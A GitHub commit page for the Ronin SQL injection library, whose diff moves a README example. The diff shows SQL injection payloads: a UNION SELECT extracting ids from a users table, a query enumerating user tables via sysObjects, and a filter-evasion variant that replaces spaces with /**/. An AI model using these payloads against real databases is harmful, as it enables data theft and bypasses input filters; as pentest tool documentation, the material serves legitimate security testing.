Skip to content
Browse files

Moved the filter evasion example down.

  • Loading branch information...
1 parent dd53af3 commit 501e481d04729bfa3e149e072ff6efe7f01874c0 @postmodern postmodern committed Jan 21, 2013
Showing with 6 additions and 7 deletions.
  1. +6 −7 README.md
View
13 README.md
@@ -86,13 +86,6 @@ Sub-Statements:
puts sqli
# 1 UNION SELECT (1,2,3,4,id) FROM users
-Filter evasion:
-
- sqli = Ronin::SQL::Injection.new
- sqli.union { select(1,2,3,4,id).from(users) }
- puts sqli.to_sql(:space => '/**/')
- # 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
-
Test if a table exists:
sqli = Ronin::SQL::Injection.new
@@ -138,6 +131,12 @@ Find user supplied tables via the `sysObjects` table:
puts sqli.to_sql(:terminate => true)
# 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--
+Bypass filters using `/**/` instead of spaces:
+
+ sqli = Ronin::SQL::Injection.new
+ sqli.union { select(1,2,3,4,id).from(users) }
+ puts sqli.to_sql(:space => '/**/')
+ # 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
## Requirements

0 comments on commit 501e481

Please sign in to comment.
Something went wrong with that request. Please try again.